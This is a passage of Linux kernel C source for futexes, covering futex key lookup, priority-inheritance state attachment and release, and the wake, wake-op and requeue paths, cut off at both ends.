if (unlikely(!access_ok(rw, uaddr, sizeof(u32))))
return -EFAULT;
if (unlikely(should_fail_futex(fshared)))
return -EFAULT;
/*
* PROCESS_PRIVATE futexes are fast.
* As the mm cannot disappear under us and the 'key' only needs
 * virtual address, we don't even have to find the underlying vma.
 * Note: We do have to check 'uaddr' is a valid user address,
* but access_ok() should be faster than find_vma()
*/
if (!fshared) {
key->private.mm = mm;
key->private.address = address;
get_futex_key_refs(key); /* implies smp_mb(); (B) */
return 0;
}
again:
/* Ignore any VERIFY_READ mapping (futex common case) */
if (unlikely(should_fail_futex(fshared)))
return -EFAULT;
err = get_user_pages_fast(address, 1, 1, &page);
/*
 * If write access is not required (e.g. FUTEX_WAIT), try to
 * get read-only access.
*/
if (err == -EFAULT && rw == VERIFY_READ) {
err = get_user_pages_fast(address, 1, 0, &page);
ro = 1;
}
if (err < 0)
return err;
else
err = 0;
/*
* The treatment of mapping from this point on is critical. The page
* lock protects many things but in this context the page lock
* stabilizes mapping, prevents inode freeing in the shared
* file-backed region case and guards against movement to swap cache.
*
* Strictly speaking the page lock is not needed in all cases being
 * considered here and the page lock forces unnecessary serialization.
* From this point on, mapping will be re-verified if necessary and
* page lock will be acquired only if it is unavoidable
*
* Mapping checks require the head page for any compound page so the
* head page and mapping is looked up now. For anonymous pages, it
* does not matter if the page splits in the future as the key is
* based on the address. For filesystem-backed pages, the tail is
* required as the index of the page determines the key. For
* base pages, there is no tail page and tail == page.
*/
tail = page;
page = compound_head(page);
mapping = READ_ONCE(page->mapping);
/*
* If page->mapping is NULL, then it cannot be a PageAnon
* page; but it might be the ZERO_PAGE or in the gate area or
* in a special mapping (all cases which we are happy to fail);
* or it may have been a good file page when get_user_pages_fast
* found it, but truncated or holepunched or subjected to
* invalidate_complete_page2 before we got the page lock (also
* cases which we are happy to fail). And we hold a reference,
* so refcount care in invalidate_complete_page's remove_mapping
* prevents drop_caches from setting mapping to NULL beneath us.
*
* The case we do have to guard against is when memory pressure made
* shmem_writepage move it from filecache to swapcache beneath us:
* an unlikely race, but we do need to retry for page->mapping.
*/
if (unlikely(!mapping)) {
int shmem_swizzled;
/*
* Page lock is required to identify which special case above
* applies. If this is really a shmem page then the page lock
* will prevent unexpected transitions.
*/
lock_page(page);
shmem_swizzled = PageSwapCache(page) || page->mapping;
unlock_page(page);
put_page(page);
if (shmem_swizzled)
goto again;
return -EFAULT;
}
/*
* Private mappings are handled in a simple way.
*
* If the futex key is stored on an anonymous page, then the associated
* object is the mm which is implicitly pinned by the calling process.
*
* NOTE: When userspace waits on a MAP_SHARED mapping, even if
* it's a read-only handle, it's expected that futexes attach to
* the object not the particular process.
*/
if (PageAnon(page)) {
/*
* A RO anonymous page will never change and thus doesn't make
* sense for futex operations.
*/
if (unlikely(should_fail_futex(fshared)) || ro) {
err = -EFAULT;
goto out;
}
key->both.offset |= FUT_OFF_MMSHARED; /* ref taken on mm */
key->private.mm = mm;
key->private.address = address;
get_futex_key_refs(key); /* implies smp_mb(); (B) */
} else {
struct inode *inode;
/*
* The associated futex object in this case is the inode and
* the page->mapping must be traversed. Ordinarily this should
* be stabilised under page lock but it's not strictly
* necessary in this case as we just want to pin the inode, not
* update the radix tree or anything like that.
*
* The RCU read lock is taken as the inode is finally freed
* under RCU. If the mapping still matches expectations then the
* mapping->host can be safely accessed as being a valid inode.
*/
rcu_read_lock();
if (READ_ONCE(page->mapping) != mapping) {
rcu_read_unlock();
put_page(page);
goto again;
}
inode = READ_ONCE(mapping->host);
if (!inode) {
rcu_read_unlock();
put_page(page);
goto again;
}
/*
* Take a reference unless it is about to be freed. Previously
* this reference was taken by ihold under the page lock
* pinning the inode in place so i_lock was unnecessary. The
* only way for this check to fail is if the inode was
* truncated in parallel which is almost certainly an
* application bug. In such a case, just retry.
*
* We are not calling into get_futex_key_refs() in file-backed
* cases, therefore a successful atomic_inc return below will
* guarantee that get_futex_key() will still imply smp_mb(); (B).
*/
if (!atomic_inc_not_zero(&inode->i_count)) {
rcu_read_unlock();
put_page(page);
goto again;
}
/* Should be impossible but let's be paranoid for now */
if (WARN_ON_ONCE(inode->i_mapping != mapping)) {
err = -EFAULT;
rcu_read_unlock();
iput(inode);
goto out;
}
key->both.offset |= FUT_OFF_INODE; /* inode-based key */
key->shared.inode = inode;
key->shared.pgoff = basepage_index(tail);
rcu_read_unlock();
}
out:
put_page(page);
return err;
}
static inline void put_futex_key(union futex_key *key)
{
drop_futex_key_refs(key);
}
/**
* fault_in_user_writeable() - Fault in user address and verify RW access
* @uaddr: pointer to faulting user space address
*
* Slow path to fixup the fault we just took in the atomic write
* access to @uaddr.
*
* We have no generic implementation of a non-destructive write to the
* user address. We know that we faulted in the atomic pagefault
* disabled section so we can as well avoid the #PF overhead by
* calling get_user_pages() right away.
*/
static int fault_in_user_writeable(u32 __user *uaddr)
{
struct mm_struct *mm = current->mm;
int ret;
down_read(&mm->mmap_sem);
ret = fixup_user_fault(current, mm, (unsigned long)uaddr,
FAULT_FLAG_WRITE, NULL);
up_read(&mm->mmap_sem);
return ret < 0 ? ret : 0;
}
/**
* futex_top_waiter() - Return the highest priority waiter on a futex
* @hb: the hash bucket the futex_q's reside in
* @key: the futex key (to distinguish it from other futex futex_q's)
*
* Must be called with the hb lock held.
*/
static struct futex_q *futex_top_waiter(struct futex_hash_bucket *hb,
union futex_key *key)
{
struct futex_q *this;
plist_for_each_entry(this, &hb->chain, list) {
if (match_futex(&this->key, key))
return this;
}
return NULL;
}
static int cmpxchg_futex_value_locked(u32 *curval, u32 __user *uaddr,
u32 uval, u32 newval)
{
int ret;
pagefault_disable();
ret = futex_atomic_cmpxchg_inatomic(curval, uaddr, uval, newval);
pagefault_enable();
return ret;
}
static int get_futex_value_locked(u32 *dest, u32 __user *from)
{
int ret;
pagefault_disable();
ret = __get_user(*dest, from);
pagefault_enable();
return ret ? -EFAULT : 0;
}
/*
* PI code:
*/
static int refill_pi_state_cache(void)
{
struct futex_pi_state *pi_state;
if (likely(current->pi_state_cache))
return 0;
pi_state = kzalloc(sizeof(*pi_state), GFP_KERNEL);
if (!pi_state)
return -ENOMEM;
INIT_LIST_HEAD(&pi_state->list);
/* pi_mutex gets initialized later */
pi_state->owner = NULL;
atomic_set(&pi_state->refcount, 1);
pi_state->key = FUTEX_KEY_INIT;
current->pi_state_cache = pi_state;
return 0;
}
static struct futex_pi_state *alloc_pi_state(void)
{
struct futex_pi_state *pi_state = current->pi_state_cache;
WARN_ON(!pi_state);
current->pi_state_cache = NULL;
return pi_state;
}
static void get_pi_state(struct futex_pi_state *pi_state)
{
WARN_ON_ONCE(!atomic_inc_not_zero(&pi_state->refcount));
}
/*
* Drops a reference to the pi_state object and frees or caches it
* when the last reference is gone.
*/
static void put_pi_state(struct futex_pi_state *pi_state)
{
if (!pi_state)
return;
if (!atomic_dec_and_test(&pi_state->refcount))
return;
/*
* If pi_state->owner is NULL, the owner is most probably dying
* and has cleaned up the pi_state already
*/
if (pi_state->owner) {
struct task_struct *owner;
raw_spin_lock_irq(&pi_state->pi_mutex.wait_lock);
owner = pi_state->owner;
if (owner) {
raw_spin_lock(&owner->pi_lock);
list_del_init(&pi_state->list);
raw_spin_unlock(&owner->pi_lock);
}
rt_mutex_proxy_unlock(&pi_state->pi_mutex, owner);
raw_spin_unlock_irq(&pi_state->pi_mutex.wait_lock);
}
if (current->pi_state_cache) {
kfree(pi_state);
} else {
/*
* pi_state->list is already empty.
* clear pi_state->owner.
* refcount is at 0 - put it back to 1.
*/
pi_state->owner = NULL;
atomic_set(&pi_state->refcount, 1);
current->pi_state_cache = pi_state;
}
}
/*
* Look up the task based on what TID userspace gave us.
 * We don't trust it.
*/
static struct task_struct *futex_find_get_task(pid_t pid)
{
struct task_struct *p;
rcu_read_lock();
p = find_task_by_vpid(pid);
if (p)
get_task_struct(p);
rcu_read_unlock();
return p;
}
#ifdef CONFIG_FUTEX_PI
/*
* This task is holding PI mutexes at exit time => bad.
* Kernel cleans up PI-state, but userspace is likely hosed.
* (Robust-futex cleanup is separate and might save the day for userspace.)
*/
void exit_pi_state_list(struct task_struct *curr)
{
struct list_head *next, *head = &curr->pi_state_list;
struct futex_pi_state *pi_state;
struct futex_hash_bucket *hb;
union futex_key key = FUTEX_KEY_INIT;
if (!futex_cmpxchg_enabled)
return;
/*
* We are a ZOMBIE and nobody can enqueue itself on
* pi_state_list anymore, but we have to be careful
* versus waiters unqueueing themselves:
*/
raw_spin_lock_irq(&curr->pi_lock);
while (!list_empty(head)) {
next = head->next;
pi_state = list_entry(next, struct futex_pi_state, list);
key = pi_state->key;
hb = hash_futex(&key);
/*
* We can race against put_pi_state() removing itself from the
* list (a waiter going away). put_pi_state() will first
* decrement the reference count and then modify the list, so
 * it's possible to see the list entry but fail this reference
* acquire.
*
* In that case; drop the locks to let put_pi_state() make
* progress and retry the loop.
*/
if (!atomic_inc_not_zero(&pi_state->refcount)) {
raw_spin_unlock_irq(&curr->pi_lock);
cpu_relax();
raw_spin_lock_irq(&curr->pi_lock);
continue;
}
raw_spin_unlock_irq(&curr->pi_lock);
spin_lock(&hb->lock);
raw_spin_lock_irq(&pi_state->pi_mutex.wait_lock);
raw_spin_lock(&curr->pi_lock);
/*
* We dropped the pi-lock, so re-check whether this
* task still owns the PI-state:
*/
if (head->next != next) {
/* retain curr->pi_lock for the loop invariant */
raw_spin_unlock(&pi_state->pi_mutex.wait_lock);
spin_unlock(&hb->lock);
put_pi_state(pi_state);
continue;
}
WARN_ON(pi_state->owner != curr);
WARN_ON(list_empty(&pi_state->list));
list_del_init(&pi_state->list);
pi_state->owner = NULL;
raw_spin_unlock(&curr->pi_lock);
raw_spin_unlock_irq(&pi_state->pi_mutex.wait_lock);
spin_unlock(&hb->lock);
rt_mutex_futex_unlock(&pi_state->pi_mutex);
put_pi_state(pi_state);
raw_spin_lock_irq(&curr->pi_lock);
}
raw_spin_unlock_irq(&curr->pi_lock);
}
#endif
/*
* We need to check the following states:
*
* Waiter | pi_state | pi->owner | uTID | uODIED | ?
*
* [1] NULL | --- | --- | 0 | 0/1 | Valid
* [2] NULL | --- | --- | >0 | 0/1 | Valid
*
* [3] Found | NULL | -- | Any | 0/1 | Invalid
*
* [4] Found | Found | NULL | 0 | 1 | Valid
* [5] Found | Found | NULL | >0 | 1 | Invalid
*
* [6] Found | Found | task | 0 | 1 | Valid
*
* [7] Found | Found | NULL | Any | 0 | Invalid
*
* [8] Found | Found | task | ==taskTID | 0/1 | Valid
* [9] Found | Found | task | 0 | 0 | Invalid
* [10] Found | Found | task | !=taskTID | 0/1 | Invalid
*
* [1] Indicates that the kernel can acquire the futex atomically. We
 * came here due to a stale FUTEX_WAITERS/FUTEX_OWNER_DIED bit.
*
* [2] Valid, if TID does not belong to a kernel thread. If no matching
* thread is found then it indicates that the owner TID has died.
*
* [3] Invalid. The waiter is queued on a non PI futex
*
* [4] Valid state after exit_robust_list(), which sets the user space
* value to FUTEX_WAITERS | FUTEX_OWNER_DIED.
*
* [5] The user space value got manipulated between exit_robust_list()
* and exit_pi_state_list()
*
* [6] Valid state after exit_pi_state_list() which sets the new owner in
* the pi_state but cannot access the user space value.
*
* [7] pi_state->owner can only be NULL when the OWNER_DIED bit is set.
*
* [8] Owner and user space value match
*
* [9] There is no transient state which sets the user space TID to 0
* except exit_robust_list(), but this is indicated by the
* FUTEX_OWNER_DIED bit. See [4]
*
* [10] There is no transient state which leaves owner and user space
* TID out of sync.
*
*
* Serialization and lifetime rules:
*
* hb->lock:
*
* hb -> futex_q, relation
* futex_q -> pi_state, relation
*
* (cannot be raw because hb can contain arbitrary amount
* of futex_q's)
*
* pi_mutex->wait_lock:
*
* {uval, pi_state}
*
* (and pi_mutex 'obviously')
*
* p->pi_lock:
*
* p->pi_state_list -> pi_state->list, relation
*
* pi_state->refcount:
*
* pi_state lifetime
*
*
* Lock order:
*
* hb->lock
* pi_mutex->wait_lock
* p->pi_lock
*
*/
/*
* Validate that the existing waiter has a pi_state and sanity check
* the pi_state against the user space value. If correct, attach to
* it.
*/
static int attach_to_pi_state(u32 __user *uaddr, u32 uval,
struct futex_pi_state *pi_state,
struct futex_pi_state **ps)
{
pid_t pid = uval & FUTEX_TID_MASK;
u32 uval2;
int ret;
/*
* Userspace might have messed up non-PI and PI futexes [3]
*/
if (unlikely(!pi_state))
return -EINVAL;
/*
* We get here with hb->lock held, and having found a
* futex_top_waiter(). This means that futex_lock_pi() of said futex_q
* has dropped the hb->lock in between queue_me() and unqueue_me_pi(),
* which in turn means that futex_lock_pi() still has a reference on
* our pi_state.
*
* The waiter holding a reference on @pi_state also protects against
* the unlocked put_pi_state() in futex_unlock_pi(), futex_lock_pi()
* and futex_wait_requeue_pi() as it cannot go to 0 and consequently
* free pi_state before we can take a reference ourselves.
*/
WARN_ON(!atomic_read(&pi_state->refcount));
/*
* Now that we have a pi_state, we can acquire wait_lock
* and do the state validation.
*/
raw_spin_lock_irq(&pi_state->pi_mutex.wait_lock);
/*
* Since {uval, pi_state} is serialized by wait_lock, and our current
* uval was read without holding it, it can have changed. Verify it
* still is what we expect it to be, otherwise retry the entire
* operation.
*/
if (get_futex_value_locked(&uval2, uaddr))
goto out_efault;
if (uval != uval2)
goto out_eagain;
/*
* Handle the owner died case:
*/
if (uval & FUTEX_OWNER_DIED) {
/*
* exit_pi_state_list sets owner to NULL and wakes the
* topmost waiter. The task which acquires the
* pi_state->rt_mutex will fixup owner.
*/
if (!pi_state->owner) {
/*
* No pi state owner, but the user space TID
* is not 0. Inconsistent state. [5]
*/
if (pid)
goto out_einval;
/*
* Take a ref on the state and return success. [4]
*/
goto out_attach;
}
/*
* If TID is 0, then either the dying owner has not
* yet executed exit_pi_state_list() or some waiter
* acquired the rtmutex in the pi state, but did not
* yet fixup the TID in user space.
*
* Take a ref on the state and return success. [6]
*/
if (!pid)
goto out_attach;
} else {
/*
* If the owner died bit is not set, then the pi_state
* must have an owner. [7]
*/
if (!pi_state->owner)
goto out_einval;
}
/*
* Bail out if user space manipulated the futex value. If pi
* state exists then the owner TID must be the same as the
* user space TID. [9/10]
*/
if (pid != task_pid_vnr(pi_state->owner))
goto out_einval;
out_attach:
get_pi_state(pi_state);
raw_spin_unlock_irq(&pi_state->pi_mutex.wait_lock);
*ps = pi_state;
return 0;
out_einval:
ret = -EINVAL;
goto out_error;
out_eagain:
ret = -EAGAIN;
goto out_error;
out_efault:
ret = -EFAULT;
goto out_error;
out_error:
raw_spin_unlock_irq(&pi_state->pi_mutex.wait_lock);
return ret;
}
/*
* Lookup the task for the TID provided from user space and attach to
* it after doing proper sanity checks.
*/
static int attach_to_pi_owner(u32 uval, union futex_key *key,
struct futex_pi_state **ps)
{
pid_t pid = uval & FUTEX_TID_MASK;
struct futex_pi_state *pi_state;
struct task_struct *p;
/*
* We are the first waiter - try to look up the real owner and attach
* the new pi_state to it, but bail out when TID = 0 [1]
*/
if (!pid)
return -ESRCH;
p = futex_find_get_task(pid);
if (!p)
return -ESRCH;
if (unlikely(p->flags & PF_KTHREAD)) {
put_task_struct(p);
return -EPERM;
}
/*
 * We need to look at the task state flags to figure out
* whether the task is exiting. To protect against the do_exit
* change of the task flags, we do this protected by
* p->pi_lock:
*/
raw_spin_lock_irq(&p->pi_lock);
if (unlikely(p->flags & PF_EXITING)) {
/*
* The task is on the way out. When PF_EXITPIDONE is
* set, we know that the task has finished the
* cleanup:
*/
int ret = (p->flags & PF_EXITPIDONE) ? -ESRCH : -EAGAIN;
raw_spin_unlock_irq(&p->pi_lock);
put_task_struct(p);
return ret;
}
/*
* No existing pi state. First waiter. [2]
*
* This creates pi_state, we have hb->lock held, this means nothing can
* observe this state, wait_lock is irrelevant.
*/
pi_state = alloc_pi_state();
/*
* Initialize the pi_mutex in locked state and make @p
* the owner of it:
*/
rt_mutex_init_proxy_locked(&pi_state->pi_mutex, p);
/* Store the key for possible exit cleanups: */
pi_state->key = *key;
WARN_ON(!list_empty(&pi_state->list));
list_add(&pi_state->list, &p->pi_state_list);
/*
* Assignment without holding pi_state->pi_mutex.wait_lock is safe
* because there is no concurrency as the object is not published yet.
*/
pi_state->owner = p;
raw_spin_unlock_irq(&p->pi_lock);
put_task_struct(p);
*ps = pi_state;
return 0;
}
static int lookup_pi_state(u32 __user *uaddr, u32 uval,
struct futex_hash_bucket *hb,
union futex_key *key, struct futex_pi_state **ps)
{
struct futex_q *top_waiter = futex_top_waiter(hb, key);
/*
* If there is a waiter on that futex, validate it and
* attach to the pi_state when the validation succeeds.
*/
if (top_waiter)
return attach_to_pi_state(uaddr, uval, top_waiter->pi_state, ps);
/*
* We are the first waiter - try to look up the owner based on
* @uval and attach to it.
*/
return attach_to_pi_owner(uval, key, ps);
}
static int lock_pi_update_atomic(u32 __user *uaddr, u32 uval, u32 newval)
{
u32 uninitialized_var(curval);
if (unlikely(should_fail_futex(true)))
return -EFAULT;
if (unlikely(cmpxchg_futex_value_locked(&curval, uaddr, uval, newval)))
return -EFAULT;
/* If user space value changed, let the caller retry */
return curval != uval ? -EAGAIN : 0;
}
/**
* futex_lock_pi_atomic() - Atomic work required to acquire a pi aware futex
* @uaddr: the pi futex user address
* @hb: the pi futex hash bucket
* @key: the futex key associated with uaddr and hb
* @ps: the pi_state pointer where we store the result of the
* lookup
* @task: the task to perform the atomic lock work for. This will
* be "current" except in the case of requeue pi.
* @set_waiters: force setting the FUTEX_WAITERS bit (1) or not (0)
*
* Return:
* - 0 - ready to wait;
* - 1 - acquired the lock;
* - <0 - error
*
* The hb->lock and futex_key refs shall be held by the caller.
*/
static int futex_lock_pi_atomic(u32 __user *uaddr, struct futex_hash_bucket *hb,
union futex_key *key,
struct futex_pi_state **ps,
struct task_struct *task, int set_waiters)
{
u32 uval, newval, vpid = task_pid_vnr(task);
struct futex_q *top_waiter;
int ret;
/*
* Read the user space value first so we can validate a few
* things before proceeding further.
*/
if (get_futex_value_locked(&uval, uaddr))
return -EFAULT;
if (unlikely(should_fail_futex(true)))
return -EFAULT;
/*
* Detect deadlocks.
*/
if ((unlikely((uval & FUTEX_TID_MASK) == vpid)))
return -EDEADLK;
if ((unlikely(should_fail_futex(true))))
return -EDEADLK;
/*
* Lookup existing state first. If it exists, try to attach to
* its pi_state.
*/
top_waiter = futex_top_waiter(hb, key);
if (top_waiter)
return attach_to_pi_state(uaddr, uval, top_waiter->pi_state, ps);
/*
	 * No waiter and the user space TID is 0. We are here because
	 * the waiters bit or the owner died bit is set, because we were
	 * called on the FUTEX_CMP_REQUEUE_PI path, or because something
	 * else made user space take the syscall.
*/
if (!(uval & FUTEX_TID_MASK)) {
/*
* We take over the futex. No other waiters and the user space
* TID is 0. We preserve the owner died bit.
*/
newval = uval & FUTEX_OWNER_DIED;
newval |= vpid;
/* The futex requeue_pi code can enforce the waiters bit */
if (set_waiters)
newval |= FUTEX_WAITERS;
ret = lock_pi_update_atomic(uaddr, uval, newval);
/* If the take over worked, return 1 */
return ret < 0 ? ret : 1;
}
/*
* First waiter. Set the waiters bit before attaching ourself to
* the owner. If owner tries to unlock, it will be forced into
* the kernel and blocked on hb->lock.
*/
newval = uval | FUTEX_WAITERS;
ret = lock_pi_update_atomic(uaddr, uval, newval);
if (ret)
return ret;
/*
* If the update of the user space value succeeded, we try to
* attach to the owner. If that fails, no harm done, we only
* set the FUTEX_WAITERS bit in the user space variable.
*/
return attach_to_pi_owner(uval, key, ps);
}
/**
* __unqueue_futex() - Remove the futex_q from its futex_hash_bucket
* @q: The futex_q to unqueue
*
* The q->lock_ptr must not be NULL and must be held by the caller.
*/
static void __unqueue_futex(struct futex_q *q)
{
struct futex_hash_bucket *hb;
if (WARN_ON_SMP(!q->lock_ptr || !spin_is_locked(q->lock_ptr))
|| WARN_ON(plist_node_empty(&q->list)))
return;
hb = container_of(q->lock_ptr, struct futex_hash_bucket, lock);
plist_del(&q->list, &hb->chain);
hb_waiters_dec(hb);
}
/*
* The hash bucket lock must be held when this is called.
* Afterwards, the futex_q must not be accessed. Callers
* must ensure to later call wake_up_q() for the actual
* wakeups to occur.
*/
static void mark_wake_futex(struct wake_q_head *wake_q, struct futex_q *q)
{
struct task_struct *p = q->task;
if (WARN(q->pi_state || q->rt_waiter, "refusing to wake PI futex\n"))
return;
/*
* Queue the task for later wakeup for after we've released
* the hb->lock. wake_q_add() grabs reference to p.
*/
wake_q_add(wake_q, p);
__unqueue_futex(q);
/*
* The waiting task can free the futex_q as soon as q->lock_ptr = NULL
* is written, without taking any locks. This is possible in the event
* of a spurious wakeup, for example. A memory barrier is required here
* to prevent the following store to lock_ptr from getting ahead of the
* plist_del in __unqueue_futex().
*/
smp_store_release(&q->lock_ptr, NULL);
}
/*
* Caller must hold a reference on @pi_state.
*/
static int wake_futex_pi(u32 __user *uaddr, u32 uval, struct futex_pi_state *pi_state)
{
u32 uninitialized_var(curval), newval;
struct task_struct *new_owner;
bool postunlock = false;
DEFINE_WAKE_Q(wake_q);
int ret = 0;
new_owner = rt_mutex_next_owner(&pi_state->pi_mutex);
if (WARN_ON_ONCE(!new_owner)) {
/*
* As per the comment in futex_unlock_pi() this should not happen.
*
* When this happens, give up our locks and try again, giving
* the futex_lock_pi() instance time to complete, either by
* waiting on the rtmutex or removing itself from the futex
* queue.
*/
ret = -EAGAIN;
goto out_unlock;
}
/*
* We pass it to the next owner. The WAITERS bit is always kept
* enabled while there is PI state around. We cleanup the owner
* died bit, because we are the owner.
*/
newval = FUTEX_WAITERS | task_pid_vnr(new_owner);
if (unlikely(should_fail_futex(true)))
ret = -EFAULT;
if (cmpxchg_futex_value_locked(&curval, uaddr, uval, newval)) {
ret = -EFAULT;
} else if (curval != uval) {
/*
* If a unconditional UNLOCK_PI operation (user space did not
* try the TID->0 transition) raced with a waiter setting the
* FUTEX_WAITERS flag between get_user() and locking the hash
* bucket lock, retry the operation.
*/
if ((FUTEX_TID_MASK & curval) == uval)
ret = -EAGAIN;
else
ret = -EINVAL;
}
if (ret)
goto out_unlock;
/*
* This is a point of no return; once we modify the uval there is no
* going back and subsequent operations must not fail.
*/
raw_spin_lock(&pi_state->owner->pi_lock);
WARN_ON(list_empty(&pi_state->list));
list_del_init(&pi_state->list);
raw_spin_unlock(&pi_state->owner->pi_lock);
raw_spin_lock(&new_owner->pi_lock);
WARN_ON(!list_empty(&pi_state->list));
list_add(&pi_state->list, &new_owner->pi_state_list);
pi_state->owner = new_owner;
raw_spin_unlock(&new_owner->pi_lock);
postunlock = __rt_mutex_futex_unlock(&pi_state->pi_mutex, &wake_q);
out_unlock:
raw_spin_unlock_irq(&pi_state->pi_mutex.wait_lock);
if (postunlock)
rt_mutex_postunlock(&wake_q);
return ret;
}
/*
 * Take the two hash bucket locks in a fixed (address) order to avoid
 * ABBA deadlocks, and express the nesting to lockdep:
 */
static inline void
double_lock_hb(struct futex_hash_bucket *hb1, struct futex_hash_bucket *hb2)
{
if (hb1 <= hb2) {
spin_lock(&hb1->lock);
if (hb1 < hb2)
spin_lock_nested(&hb2->lock, SINGLE_DEPTH_NESTING);
} else { /* hb1 > hb2 */
spin_lock(&hb2->lock);
spin_lock_nested(&hb1->lock, SINGLE_DEPTH_NESTING);
}
}
static inline void
double_unlock_hb(struct futex_hash_bucket *hb1, struct futex_hash_bucket *hb2)
{
spin_unlock(&hb1->lock);
if (hb1 != hb2)
spin_unlock(&hb2->lock);
}
/*
* Wake up waiters matching bitset queued on this futex (uaddr).
*/
static int
futex_wake(u32 __user *uaddr, unsigned int flags, int nr_wake, u32 bitset)
{
struct futex_hash_bucket *hb;
struct futex_q *this, *next;
union futex_key key = FUTEX_KEY_INIT;
int ret;
DEFINE_WAKE_Q(wake_q);
if (!bitset)
return -EINVAL;
ret = get_futex_key(uaddr, flags & FLAGS_SHARED, &key, VERIFY_READ);
if (unlikely(ret != 0))
goto out;
hb = hash_futex(&key);
/* Make sure we really have tasks to wakeup */
if (!hb_waiters_pending(hb))
goto out_put_key;
spin_lock(&hb->lock);
plist_for_each_entry_safe(this, next, &hb->chain, list) {
if (match_futex (&this->key, &key)) {
if (this->pi_state || this->rt_waiter) {
ret = -EINVAL;
break;
}
/* Check if one of the bits is set in both bitsets */
if (!(this->bitset & bitset))
continue;
mark_wake_futex(&wake_q, this);
if (++ret >= nr_wake)
break;
}
}
spin_unlock(&hb->lock);
wake_up_q(&wake_q);
out_put_key:
put_futex_key(&key);
out:
return ret;
}
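/*
 * Decode @encoded_op and apply the encoded atomic read-modify-write to
 * @uaddr; this is the kernel half of FUTEX_WAKE_OP.
 *
 * The 32-bit @encoded_op packs four fields, as built by the FUTEX_OP()
 * macro in the uapi header:
 *
 *	bit  31    : FUTEX_OP_OPARG_SHIFT - oparg is a shift count (1 << oparg)
 *	bits 30-28 : op     - arithmetic op (SET, ADD, OR, ANDN, XOR)
 *	bits 27-24 : cmp    - comparison applied to the old futex value
 *	bits 23-12 : oparg  - operand, sign extended from 12 bits
 *	bits 11-0  : cmparg - comparison operand, sign extended from 12 bits
 *
 * Returns the boolean result of "oldval <cmp> cmparg" on success, or a
 * negative error code.
 */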
static int futex_atomic_op_inuser(unsigned int encoded_op, u32 __user *uaddr)
{
unsigned int op = (encoded_op & 0x70000000) >> 28;
unsigned int cmp = (encoded_op & 0x0f000000) >> 24;
int oparg = sign_extend32((encoded_op & 0x00fff000) >> 12, 11);
int cmparg = sign_extend32(encoded_op & 0x00000fff, 11);
int oldval, ret;
if (encoded_op & (FUTEX_OP_OPARG_SHIFT << 28)) {
if (oparg < 0 || oparg > 31) {
char comm[sizeof(current->comm)];
/*
* kill this print and return -EINVAL when userspace
* is sane again
*/
pr_info_ratelimited("futex_wake_op: %s tries to shift op by %d; fix this program\n",
get_task_comm(comm, current), oparg);
oparg &= 31;
}
oparg = 1 << oparg;
}
if (!access_ok(VERIFY_WRITE, uaddr, sizeof(u32)))
return -EFAULT;
ret = arch_futex_atomic_op_inuser(op, oparg, &oldval, uaddr);
if (ret)
return ret;
switch (cmp) {
case FUTEX_OP_CMP_EQ:
return oldval == cmparg;
case FUTEX_OP_CMP_NE:
return oldval != cmparg;
case FUTEX_OP_CMP_LT:
return oldval < cmparg;
case FUTEX_OP_CMP_GE:
return oldval >= cmparg;
case FUTEX_OP_CMP_LE:
return oldval <= cmparg;
case FUTEX_OP_CMP_GT:
return oldval > cmparg;
default:
return -ENOSYS;
}
}
/*
* Wake up all waiters hashed on the physical page that is mapped
* to this virtual address:
*/
static int
futex_wake_op(u32 __user *uaddr1, unsigned int flags, u32 __user *uaddr2,
int nr_wake, int nr_wake2, int op)
{
union futex_key key1 = FUTEX_KEY_INIT, key2 = FUTEX_KEY_INIT;
struct futex_hash_bucket *hb1, *hb2;
struct futex_q *this, *next;
int ret, op_ret;
DEFINE_WAKE_Q(wake_q);
retry:
ret = get_futex_key(uaddr1, flags & FLAGS_SHARED, &key1, VERIFY_READ);
if (unlikely(ret != 0))
goto out;
ret = get_futex_key(uaddr2, flags & FLAGS_SHARED, &key2, VERIFY_WRITE);
if (unlikely(ret != 0))
goto out_put_key1;
hb1 = hash_futex(&key1);
hb2 = hash_futex(&key2);
retry_private:
double_lock_hb(hb1, hb2);
op_ret = futex_atomic_op_inuser(op, uaddr2);
if (unlikely(op_ret < 0)) {
double_unlock_hb(hb1, hb2);
#ifndef CONFIG_MMU
/*
* we don't get EFAULT from MMU faults if we don't have an MMU,
* but we might get them from range checking
*/
ret = op_ret;
goto out_put_keys;
#endif
if (unlikely(op_ret != -EFAULT)) {
ret = op_ret;
goto out_put_keys;
}
ret = fault_in_user_writeable(uaddr2);
if (ret)
goto out_put_keys;
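		/*
		 * The fault was handled. Private futexes hash on
		 * current->mm and the address, so the keys stay valid
		 * across the fault and we can retry with the buckets we
		 * already looked up. For shared futexes the mapping may
		 * have changed, so drop the keys and redo the lookup.
		 */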
if (!(flags & FLAGS_SHARED))
goto retry_private;
put_futex_key(&key2);
put_futex_key(&key1);
goto retry;
}
plist_for_each_entry_safe(this, next, &hb1->chain, list) {
if (match_futex (&this->key, &key1)) {
if (this->pi_state || this->rt_waiter) {
ret = -EINVAL;
goto out_unlock;
}
mark_wake_futex(&wake_q, this);
if (++ret >= nr_wake)
break;
}
}
if (op_ret > 0) {
op_ret = 0;
plist_for_each_entry_safe(this, next, &hb2->chain, list) {
if (match_futex (&this->key, &key2)) {
if (this->pi_state || this->rt_waiter) {
ret = -EINVAL;
goto out_unlock;
}
mark_wake_futex(&wake_q, this);
if (++op_ret >= nr_wake2)
break;
}
}
ret += op_ret;
}
out_unlock:
double_unlock_hb(hb1, hb2);
wake_up_q(&wake_q);
out_put_keys:
put_futex_key(&key2);
out_put_key1:
put_futex_key(&key1);
out:
return ret;
}
/**
* requeue_futex() - Requeue a futex_q from one hb to another
* @q: the futex_q to requeue
* @hb1: the source hash_bucket
* @hb2: the target hash_bucket
* @key2: the new key for the requeued futex_q
*/
static inline
void requeue_futex(struct futex_q *q, struct futex_hash_bucket *hb1,
struct futex_hash_bucket *hb2, union futex_key *key2)
{
/*
* If key1 and key2 hash to the same bucket, no need to
* requeue.
*/
if (likely(&hb1->chain != &hb2->chain)) {
plist_del(&q->list, &hb1->chain);
hb_waiters_dec(hb1);
hb_waiters_inc(hb2);
plist_add(&q->list, &hb2->chain);
q->lock_ptr = &hb2->lock;
}
get_futex_key_refs(key2);
q->key = *key2;
}
/**
* requeue_pi_wake_futex() - Wake a task that acquired the lock during requeue
* @q: the futex_q
* @key: the key of the requeue target futex
* @hb: the hash_bucket of the requeue target futex
*
* During futex_requeue, with requeue_pi=1, it is possible to acquire the
* target futex if it is uncontended or via a lock steal. Set the futex_q key
* to the requeue target futex so the waiter can detect the wakeup on the right
* futex, but remove it from the hb and NULL the rt_waiter so it can detect
